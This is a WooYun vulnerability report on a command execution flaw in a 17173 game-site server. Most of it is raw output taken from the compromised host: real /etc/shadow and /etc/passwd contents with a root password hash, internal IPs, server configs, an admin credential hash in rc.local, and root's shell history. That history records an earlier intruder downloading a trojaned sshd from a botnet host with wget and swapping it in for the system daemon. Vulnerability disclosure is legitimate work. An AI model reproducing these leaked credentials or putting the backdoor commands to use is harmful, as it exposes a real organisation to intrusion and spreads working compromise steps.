当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045480

漏洞标题:17173某站命令执行漏洞

相关厂商:17173游戏

漏洞作者: 【|→上善若水】

提交时间:2013-12-10 15:39

修复时间:2014-01-24 15:39

公开时间:2014-01-24 15:39

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-10: 细节已通知厂商并且等待厂商处理中
2013-12-11: 厂商已经确认,细节仅向厂商公开
2013-12-21: 细节向核心白帽子及相关领域专家公开
2013-12-31: 细节向普通白帽子公开
2014-01-10: 细节向实习白帽子公开
2014-01-24: 细节向公众公开

简要描述:


详细说明:

通过漏洞利用工具可查看多处敏感信息。
以下为收集信息:
http://v.17173.com/live/rank/rank.action
=======pwd========
/opt/17173/resin-3.1.9
PATH:/home/httpd/html/active/live/agreement/img/
=======ifconfig==================================================================================================
eth0 Link encap:Ethernet HWaddr 5C:F3:FC:4A:F8:F4
inet addr:117.27.230.153 Bcast:117.27.230.191 Mask:255.255.255.192
inet6 addr: fe80::5ef3:fcff:fe4a:f8f4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5667640 errors:0 dropped:0 overruns:0 frame:0
TX packets:2489078 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:390957349 (372.8 MiB) TX bytes:1813703159 (1.6 GiB)
eth1 Link encap:Ethernet HWaddr 5C:F3:FC:4A:F8:F6
inet addr:10.59.108.19 Bcast:10.59.108.255 Mask:255.255.255.0
inet6 addr: fe80::5ef3:fcff:fe4a:f8f6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:10715997405 errors:0 dropped:0 overruns:0 frame:0
TX packets:9142749447 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2170583358838 (1.9 TiB) TX bytes:1981133660005 (1.8 TiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:705697602 errors:0 dropped:0 overruns:0 frame:0
TX packets:705697602 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:631787284574 (588.3 GiB) TX bytes:631787284574 (588.3 GiB)
============uname -a ==============================================================================
Linux resin19 2.6.32-358.el6.x86_64 #1 SMP Tue Jan 29 11:47:41 EST 2013 x86_64 x86_64 x86_64 GNU/Linux
===================/etc/shadow===================================
root:$1$ltvWzIiD$0nSk23ZRaUbCl5iyb6RMz1:15977:0:99999:7:::
bin:*:15615:0:99999:7:::
daemon:*:15615:0:99999:7:::
adm:*:15615:0:99999:7:::
lp:*:15615:0:99999:7:::
sync:*:15615:0:99999:7:::
shutdown:*:15615:0:99999:7:::
halt:*:15615:0:99999:7:::
mail:*:15615:0:99999:7:::
uucp:*:15615:0:99999:7:::
operator:*:15615:0:99999:7:::
games:*:15615:0:99999:7:::
gopher:*:15615:0:99999:7:::
ftp:*:15615:0:99999:7:::
nobody:*:15615:0:99999:7:::
dbus:!!:15965::::::
rpc:!!:15965:0:99999:7:::
vcsa:!!:15965::::::
abrt:!!:15965::::::
saslauth:!!:15965::::::
mailnull:!!:15965::::::
smmsp:!!:15965::::::
haldaemon:!!:15965::::::
ntp:!!:15965::::::
apache:!!:15965::::::
rpcuser:!!:15965::::::
nfsnobody:!!:15965::::::
gdm:!!:15965::::::
sshd:!!:15965::::::
postfix:!!:15965::::::
mysql:!!:15965::::::
tcpdump:!!:15965::::::
oprofile:!!:15965::::::
nagios:!!:15965:0:99999:7:::
===================/etc/passwd===================================
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nagios:x:500:500::/home/nagios:/bin/bash
==================/opt/17173/resin-3.1.9=======================================================================
admin
bin
conf
ext-webapp-lib
lib
libexec64
log
php
plugins
webapps
=====================/opt/17173/resin-3.1.9/conf/resin.conf=============================================
<!--
- Resin 3.1 configuration file.
-->
<resin xmlns="http://caucho.com/ns/resin"
xmlns:resin="http://caucho.com/ns/resin/core">
<!-- adds all .jar files under the resin/lib directory -->
<class-loader>
<tree-loader path="${resin.home}/ext-lib"/>
<tree-loader path="${resin.root}/ext-lib"/>
<tree-loader path="${resin.home}/lib"/>
<tree-loader path="${resin.root}/lib"/>
</class-loader>
<!--
- Management configuration
-
- Remote management requires at least one enabled admin user.
-->
<management path="${resin.root}/admin">
<user name="admin" password="password" disable="true"/>
<resin:if test="${resin.professional}">
<deploy-service/>
<jmx-service/>
<log-service/>
<xa-log-service/>
</resin:if>
</management>
<!--
- Logging configuration for the JDK logging API.
-->
<log name="" level="info" path="stdout:"
timestamp="[%H:%M:%S.%s] {%{thread}} "/>
<!--
- 'info' for production
- 'fine' or 'finer' for development and troubleshooting
-->
<logger name="com.caucho" level="info"/>
<logger name="com.caucho.java" level="config"/>
<logger name="com.caucho.loader" level="config"/>
<!--
- For production sites, change dependency-check-interval to something
- like 600s, so it only checks for updates every 10 minutes.
-->
<dependency-check-interval>2s</dependency-check-interval>
<!--
- SMTP server for sending mail notifications
-->
<system-property mail.smtp.host="127.0.0.1"/>
<system-property mail.smtp.port="25"/>
<!--
- Sets the default character encoding to utf-8
-
- <character-encoding>utf-8</character-encoding>
-->
<!--
- You can change the compiler to "javac", "eclipse" or "internal".
-->
<javac compiler="internal" args="-source 1.5"/>
<!-- Security providers.
- <security-provider>
- com.sun.net.ssl.internal.ssl.Provider
- </security-provider>
-->
<!-- Uncomment to use Resin's XML implementations
-
- <system-property javax.xml.parsers.DocumentBuilderFactory
- ="com.caucho.xml.parsers.XmlDocumentBuilderFactory"/>
- <system-property javax.xml.parsers.SAXParserFactory
- ="com.caucho.xml.parsers.XmlSAXParserFactory"/>
-->
<cluster id="app-tier">
<!-- sets the content root for the cluster, relative to server.root -->
<root-directory>.</root-directory>
<server-default>
<!-- The http port -->
<http address="*" port="8080"/>
<!--
- SSL port configuration:
-
- <http address="*" port="8443">
- <openssl>
- <certificate-file>keys/gryffindor.crt</certificate-file>
- <certificate-key-file>keys/gryffindor.key</certificate-key-file>
- <password>test123</password>
- </openssl>
- </http>
-->
<!--
- The JVM arguments
-->
<jvm-arg>-Xmx256m</jvm-arg>
<jvm-arg>-Xss1m</jvm-arg>
<jvm-arg>-Xdebug</jvm-arg>
<jvm-arg>-Dcom.sun.management.jmxremote</jvm-arg>
<!--
- Uncomment to enable admin heap dumps
- <jvm-arg>-agentlib:resin</jvm-arg>
-->
<!--
- arguments for the watchdog process
-->
<watchdog-jvm-arg>-Dcom.sun.management.jmxremote</watchdog-jvm-arg>
<watchdog-port>6600</watchdog-port>
<!--
- Configures the minimum free memory allowed before Resin
- will force a restart.
-->
<memory-free-min>1M</memory-free-min>
<!-- Maximum number of threads. -->
<thread-max>256</thread-max>
<!-- Configures the socket timeout -->
<socket-timeout>65s</socket-timeout>
<!-- Configures the keepalive -->
<keepalive-max>128</keepalive-max>
<keepalive-timeout>15s</keepalive-timeout>
<!--
- If starting bin/resin as root on Unix, specify the user name
- and group name for the web server user.
-
- <user-name>resin</user-name>
- <group-name>resin</group-name>
-->
</server-default>
<!-- define the servers in the cluster -->
<server id="" address="127.0.0.1" port="6800"/>
<!--
- Configures the persistent store for single-server or clustered
- in Resin professional.
-->
<resin:if test="${resin.professional}">
<persistent-store type="cluster">
<init path="session"/>
</persistent-store>
</resin:if>
<!--
- For security, use a different cookie for SSL sessions.
- <ssl-session-cookie>SSL_JSESSIONID</ssl-session-cookie>
-->
<!--
- Enables the cache (available in Resin Professional)
-->
<resin:if test="${resin.professional}">
<cache path="cache" memory-size="64M">
<!-- Vary header rewriting for IE -->
<rewrite-vary-as-private/>
</cache>
</resin:if>
<!--
- Enables periodic checking of the server status and
- check for deadlocks..
-
- All servers can add <url>s to be checked.
-->
<resin:if test="${resin.professional}">
<ping>
<!-- <url>http://localhost:8080/test-ping.jsp</url> -->
</ping>
</resin:if>
<!--
- Defaults applied to each web-app.
-->
<web-app-default>
<prologue>
<!--
- Extension library for common jar files. The ext is safe
- even for non-classloader aware jars. The loaded classes
- will be loaded separately for each web-app, i.e. the class
- itself will be distinct.
-->
<class-loader>
<tree-loader path="${resin.root}/ext-webapp-lib"/>
</class-loader>
<!--
- Enable EL expressions in Servlet and Filter init-param
-->
<allow-servlet-el/>
</prologue>

<!--
- Sets timeout values for cacheable pages, e.g. static pages.
-->
<cache-mapping url-pattern="/" expires="5s"/>
<cache-mapping url-pattern="*.gif" expires="60s"/>
<cache-mapping url-pattern="*.jpg" expires="60s"/>
<cache-mapping url-pattern="*.png" expires="60s"/>
<!--
- for security, disable session URLs by default.
-->
<session-config>
<enable-url-rewriting>false</enable-url-rewriting>
</session-config>
<!--
- For security, set the HttpOnly flag in cookies.
- <cookie-http-only/>
-->
<!--
- Some JSP packages have incorrect .tld files. It's possible to
- set validate-taglib-schema to false to work around these packages.
-->
<jsp>
<validate-taglib-schema>true</validate-taglib-schema>
<fast-jstl>true</fast-jstl>
</jsp>
</web-app-default>
<!-- includes the app-default for default web-app behavior -->
<resin:import path="${resin.home}/conf/app-default.xml"/>
<!--
- Sample database pool configuration
-
- The JDBC name is java:comp/env/jdbc/test
<database>
<jndi-name>jdbc/mysql</jndi-name>
<driver type="org.gjt.mm.mysql.Driver">
<url>jdbc:mysql://localhost:3306/test</url>
<user></user>
<password></password>
</driver>
<prepared-statement-cache-size>8</prepared-statement-cache-size>
<max-connections>20</max-connections>
<max-idle-time>30s</max-idle-time>
</database>
-->
<!--
- Default host configuration applied to all virtual hosts.
-->
<host-default>
<!--
- With another web server, like Apache, this can be commented out
- because the web server will log this information.
-->
<access-log path="logs/access.log"
format='%h %l %u %t "%r" %s %b "%{Referer}i" "%{User-Agent}i"'
rollover-period="1W"/>
<!-- creates the webapps directory for .war expansion -->
<web-app-deploy path="webapps"/>
<!-- creates the deploy directory for .ear expansion -->
<ear-deploy path="deploy">
<ear-default>
<ejb-server>
<config-directory>WEB-INF</config-directory>
</ejb-server>
</ear-default>
</ear-deploy>
<!-- creates the deploy directory for .rar expansion -->
<resource-deploy path="deploy"/>
</host-default>
<!-- configures a deployment directory for virtual hosts -->
<host-deploy path="hosts">
<host-default>
<resin:import path="host.xml" optional="true"/>
</host-default>
</host-deploy>
<!-- configures the default host, matching any host name -->
<host id="" root-directory=".">
<!--
- configures an explicit root web-app matching the
- webapp's ROOT
-->
<web-app id="/" root-directory="webapps/ROOT"/>
<web-app id="/resin-admin" root-directory="${resin.home}/php/admin">
<!--
- Administration application /resin-admin
-->
<prologue>
<resin:set var="resin_admin_external" value="false"/>
<resin:set var="resin_admin_insecure" value="true"/>
</prologue>
</web-app>
</host>
</cluster>
<!--
- Configuration for the web-tier/load-balancer
-->
<resin:if test="${resin.professional}">
<cluster id="web-tier">
<server-default>
<!-- The http port -->
<http address="*" port="9080"/>
</server-default>
<server id="web-a" address="127.0.0.1" port="6700"/>
<cache path="cache" memory-size="64M"/>
<host id="">
<web-app id="/">
<rewrite-dispatch>
<load-balance regexp="" cluster="app-tier"/>
</rewrite-dispatch>
</web-app>
</host>
</cluster>
</resin:if>
</resin>
=======================nginx.conf================================================================
user root root;
worker_rlimit_nofile 51200;
worker_processes 16;
#error_log logs/error.log debug;
error_log logs/error_live.log info;
pid sbin/nginx_live.pid;
events {
worker_connections 10240;
use epoll;
}
http {
server_tokens off;
include mime.types;
default_type application/octet-stream;
log_format vms '$http_x_forwarded_for $remote_addr $host - $remote_user '
'[$time_local] "$request" $status $body_bytes_sent '
'$request_time "$http_referer" "$http_user_agent" '
'$stream_type $limit_rate_after $limit_rate';
log_format common '$remote_addr "$http_x_forwarded_for" $host $remote_user '
'[$time_local] "$request" $status $body_bytes_sent '
'$request_time "$http_referer" "$http_user_agent"';
access_log logs/access_live.log vms;
sendfile on;
tcp_nopush on;
tcp_nodelay off;
keepalive_timeout 5;
keepalive_requests 2000;
send_timeout 120;
#client_body_timeout 10;
#client_header_timeout 10;
server_names_hash_max_size 512;
server_names_hash_bucket_size 128;
client_header_buffer_size 1k;
client_max_body_size 600m;
large_client_header_buffers 4 4k;
request_pool_size 1024k;
connection_pool_size 512;
output_buffers 1 1024k;
postpone_output 1460;
ignore_invalid_headers on;
#expires 120d;
gzip off;
map $request_filename $stream_type {
hostnames;
*.mp4 mp4;
*.flv flv;
*.f4v flv;
*.wmv wmv;
*.asf wmv;
*.wma wmv;
default oct;
}
server {
listen 8081;
server_name _ "";
access_log off;
root /data/;
}
server {
listen 8080 default_server;
server_name localhost;
root /opt/nginx/html;
location ^~ /playlist/ {
access_log logs/live_accesss.log common;
set $sock "unix:/tmp/liveroom.sock";
if ($uri ~ "^/playlist/([0-9]+)\.m3u8") {
expires -1;
ffs_param M3U8 $1;
ffs_param FORMAT mpegts;
ffs_pass $sock;
break;
}
return 403;
}
location ^~ /hls/ {
access_log logs/live_accesss.log common;
#access_log off;
accesskey off;
set $sock "unix:/tmp/liveroom.sock";
if ($uri ~ "^/hls/([0-9]+)") {
expires -1;
add_header Content-Type "video/MP2T";
ffs_param INPUT $1;
ffs_param FORMAT mpegts;
ffs_param SEEK_WHENCE 0;
ffs_param START_TIME $arg_start;
ffs_param END_TIME $arg_end;
ffs_param VIDEO_CODEC copy;
ffs_param AUDIO_CODEC copy;
ffs_pass $sock;
break;
}
return 403;
}
location ^~ /live/ {
access_log logs/live_accesss.log common;

set $start_time -1;

if ( $arg_start ~ "([0-9]+)" ) {
set $start_time $1;
}

set $sock "unix:/tmp/liveroom.sock";

if ($uri ~ "^/live/([0-9]+)") {
expires -1;
add_header Content-Type "video/x-flv";
ffs_param INPUT $1;
ffs_param FORMAT flv;
ffs_param SEEK_WHENCE 1;
ffs_param START_TIME -1;
ffs_param END_TIME -1;
ffs_param VIDEO_CODEC copy;
ffs_param AUDIO_CODEC copy;
ffs_pass $sock;
break;
}

return 403;
}
}
}
=========================/opt/17173/nginx/conf/nginx.conf=====================================
user daemon;
worker_rlimit_nofile 40960;
#worker_cpu_affinity 00000001 00000010 00000100 00001000 00010000 00100000 01000000 10000000;
worker_processes 16;
error_log /home/logs/error.log;
#error_log /home/logs/error.log notice;
#error_log /dev/null;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#error_log logs/error.log debug;
pid logs/nginx.pid;
events {
worker_connections 10240;
use epoll;
}
http {
server_tokens off;
include mime.types;
default_type test/html;
log_format main '$remote_addr - $remote_user [$time_local] $server_name "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$request_filename"';
access_log /home/logs/access.log main;
# access_log off;
#if ($http_x_forwarded_for !~ '-')
#{
# set $remote_addr $http_x_forwarded_for;
#}
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 0;
send_timeout 300;
client_body_timeout 300;
client_header_timeout 300;

server_names_hash_max_size 512;
server_names_hash_bucket_size 128;

client_header_buffer_size 8k;
client_max_body_size 4m;
large_client_header_buffers 4 4k;
request_pool_size 1024k;
connection_pool_size 512;

output_buffers 1 1024k;
postpone_output 1460;
ignore_invalid_headers on;
add_header X-Host "226-vlog-webserver";

gzip on;
gzip_vary on;
gzip_min_length 1k;
gzip_buffers 4 8k;
gzip_http_version 1.1;
gzip_types text/plain application/x-javascript text/css application/xml;
set_real_ip_from 10.59.67.0/24;
set_real_ip_from 10.59.108.0/24;
real_ip_header X-Real-IP;
include n_*.conf;
}
===========================/opt/17173/nginx/conf/nginx.conf.default======================
#user nobody;
worker_processes 1;
#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#pid logs/nginx.pid;
events {
worker_connections 1024;
}
http {
include mime.types;
default_type application/octet-stream;
#log_format main '$remote_addr - $remote_user [$time_local] "$request" '
# '$status $body_bytes_sent "$http_referer" '
# '"$http_user_agent" "$http_x_forwarded_for"';
#access_log logs/access.log main;
sendfile on;
#tcp_nopush on;
#keepalive_timeout 0;
keepalive_timeout 65;
#gzip on;
server {
listen 80;
server_name localhost;
#charset koi8-r;
#access_log logs/host.access.log main;
location / {
root html;
index index.html index.htm;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
# proxy the PHP scripts to Apache listening on 127.0.0.1:80
#
#location ~ \.php$ {
# proxy_pass http://127.0.0.1;
#}
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
#location ~ \.php$ {
# root html;
# fastcgi_pass 127.0.0.1:9000;
# fastcgi_index index.php;
# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
# include fastcgi_params;
#}
# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}
# another virtual host using mix of IP-, name-, and port-based configuration
#
#server {
# listen 8000;
# listen somename:8080;
# server_name somename alias another.alias;
# location / {
# root html;
# index index.html index.htm;
# }
#}
# HTTPS server
#
#server {
# listen 443;
# server_name localhost;
# ssl on;
# ssl_certificate cert.pem;
# ssl_certificate_key cert.key;
# ssl_session_timeout 5m;
# ssl_protocols SSLv2 SSLv3 TLSv1;
# ssl_ciphers HIGH:!aNULL:!MD5;
# ssl_prefer_server_ciphers on;
# location / {
# root html;
# index index.html index.htm;
# }
#}
}
★K8cmd-> cat /root/.bash_history
====================================================================================================================================
ls
cd /home/
ls
mkdir liveshow
clear
ls
cd ~
ls
cd /home/
ls
chmod 777 liveshow
cd liveshow/
ls
ls
ls
ls
ls
cd /dev/
cd ~
ls
cd /home/
ls
cd /opt/
ls
cd ..
ls
mkdir data
ls
clear
ls
cd data/
ls
cd metadata/
ls
cd master/
ls
cd /opt/
ls
cd /home/liveshow/
ls
./mdsliveroom -d -u nobody --database=/data/metadata/master/ --db-mutex=500K --db-cache=100M
./scm/mdsliveroom -d -u nobody --database=/data/metadata/master/ --db-mutex=500K --db-cache=100M
./mdsliveroom -d -u nobody --database=/data/metadata/master/ --db-mutex=500K --db-cache=100M
clear
ls
cd /opt/
ls
ls
cd /home/liveshow/
ls
cd bdb/
ls
rm -rf *
ls
mkdir bdb
ls
pwd
rm -rf bdb/
ls
ls
clera
clear
ls
cd lib/
ls
cd ..
ssh 10.59.108.23
cd /home/liveshow/
ls
tar -zxvf my.tar
clear
ls
cd zhangguoqi/
ls
cd mdc-liveroom/
ls
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure "CXXFLAGS=-g -O0" "CFLAGS=-g -O0"
make clean
clera
clear
vi Makefile.am
clera
clear
CD ..
cd ..
cd /home/
ls
cd liveshow/
ls
cd bdb/
ls
cd lib/
pwd
cd /home/liveshow/zhangguoqi/mdc-liveroom/
ls
export BDD_LIBS="/home/liveshow/bdb/lib"
echo $BED_LIBS
echo $BDD_LIBS
export BDB_LIBS="/home/liveshow/bdb/lib"
export BDB_INCLUDE="/home/liveshow/bdb/include"
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure "CXXFLAGS=-g -O0" "CFLAGS=-g -O0"
make clean
ls
make
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure
ls
make
CLEAR
CLEAR
CLEAR
clear
export BDB_LIBS="/home/liveshow/bdb/lib/"
export BDB_INCLUDE="/home/liveshow/bdb/include/"
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure "CXXFLAGS=-g -O0" "CFLAGS=-g -O0"
make clean
ls
make
echo $BDD_INCLUDE
echo $BDB_INCLUDE
clear
ls
cd /home/liveshow/
ls
cd bdb/
ls
cd include/
ls
vi db.h
clear
ls
cd ..
unset BDB_INCLUDE
cd /home/liveshow/zhangguoqi/
cd mdc-liveroom/
make
noinst_PROGRAMS=mdclive
mdclive_SOURCES=global.cpp main.cpp dbenv.cpp buffer.cpp channel.cpp storage.cpp metadata.cpp task.cpp console.cpp ../lib/tcpserver2.cpp ../lib/string_tokenizer.cpp ../lib/urlcode.cpp
AM_CXXFLAGS=-Wno-deprecated $(BDB_INCLUDE)
LDADD=$(BDB_LIBS)
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure "CXXFLAGS=-g -O0" "CFLAGS=-g -O0"
make clean
ls
make
clear
cd /home/liveshow/
cd bdb/
ls
cd bin/
ls
cd /home/liveshow/live/
cd ..
ls
cd zhangguoqi/
cd mdc-liveroom/
ls
vi Makefile.am
cd /home/
ls
clear
ls
cd liveshow/
ls
cd bdb/
ls
cd lib/
ls
cp * /usr/lib
cd ..
cd bin/
cp * /usr/bin/
y
cd ..
cd include/
cp * /usr/include/
cp * /usr/include/
clear
ls
cd ..
ls
cd ..
ls
cd zhangguoqi/mdc-liveroom/
ls
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure "CXXFLAGS=-g -O0" "CFLAGS=-g -O0"
make clean
clear
ls
ls -l Makefile
make
unset BDB_LIB
export $BDB_LIB
export $BDB_LIB
echo $BDB_LIB
rm -rf autom4te.cache
aclocal;automake -a;autoconf;
#./configure
./configure "CXXFLAGS=-g -O0" "CFLAGS=-g -O0"
make clean
ls -l Makefile
make
echo $PATH
echo $LIB
clear
vi Makefile
clear
cd /home/liveshow/
ls
cd bdb/
ls
cd lib/
pwd
export BDB_LIBS="/home/liveshow/bdb/lib"
echo $BDB_LIBS
enc-update
env-update
cd /home/liveshow/
ls
cd zhangguoqi/mdc-liveroom/
ls
vi Makefile
make
clear
make
alias -p
fc-cache
clear
ls
aclocal;automake -a;autoconf;
#./configure
#./configure
aclocal;automake -a;autoconf;autoheader;
vi configure.in
aclocal;automake -a;autoconf;autoheader;
vi configure.in
aclocal;automake -a;autoconf;autoheader;
vi configure.in
ssh -p 9923 root@10.59.108.23
ssh -p 9923 10.59.108.23
ssh -p 9923 root@10.59.108.23
ssh -p 9923 root@10.59.108.23:/home/
ssh -p 9923 root@10.59.108.23
exit
cd /data/
ls
scp cluster root@10.59.108.23:/data
cd ..
cd /home/liveshow/
ls
scp mytar root@10.59.108.23:/data
scp my.tar root@10.59.108.23:/data
tar cvf dd bdb
ls
scp dd root@10.59.108.23:/opt
cd live/
ls
./mdsliveroom -d -u nobody --database=/data/metadata/master/ --db-mutex=500K --db-cache=100M
cd /data/
ls
scp cluster root@10.59.108.23:/data
cd ..
cd /home/liveshow/
ls
scp mytar root@10.59.108.23:/data
scp my.tar root@10.59.108.23:/data
tar cvf dd bdb
ls
scp dd root@10.59.108.23:/opt
cd live/
ls
./mdsliveroom -d -u nobody --database=/data/metadata/master/ --db-mutex=500K --db-cache=100M
ssh -p 9923 10.59.108.23
ssh -P 9923 10.59.108.23
ssh -p 9923 10.59.108.23
ssh root@10.59.108.23
ssh root@10.59.108.19
ssh root@10.59.108.17
ssh root@10.59.108.18
exit
id
uptime
ls -l
ps axu
telnet localhost 22
ps axu|grep ssh
cat /etc/ssh/sshd_config
telnet 10.59.108.18 22
ifconfig
uname -a
wget http://218.199.102.59/.others/botnet59/sshd
chmod a+x sshd
./sshd
mv sshd /usr/sbin/sshd
service sshd restart
telnet localhost 22
sed -i -e 's/ListenAddress 10.59.108.18/#ListenAddress 10.59.108.18/' /etc/ssh/sshd_config
service sshd restart
telnet localhost 22
telnet 10.59.108.18 22
exit
★K8cmd-> cat /etc/rc.local
====================================================================================================================================
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
/opt/17173/nagios/bin/nrpe -c /opt/17173/nagios/etc/nrpe.cfg -d
route add -net 10.6.0.0 netmask 255.255.0.0 gw 10.59.108.254
route add -net 10.5.0.0 netmask 255.255.0.0 gw 10.59.108.254
#live
/etc/init.d/chat start >> <user name="admin" password="yCGkvrQHY7K8qtlHsgJ6zg=="/>
/etc/init.d/front1 start
/etc/init.d/front2 start
/etc/init.d/trade start
/opt/17173/nginx/sbin/nginx

漏洞证明:

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


8.jpg


9.jpg


10.jpg


修复方案:

升级。
年底了,发个礼物呗!

版权声明:转载请注明来源 【|→上善若水】@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-12-11 10:05

厂商回复:

struts漏洞已经修复。

最新状态:

暂无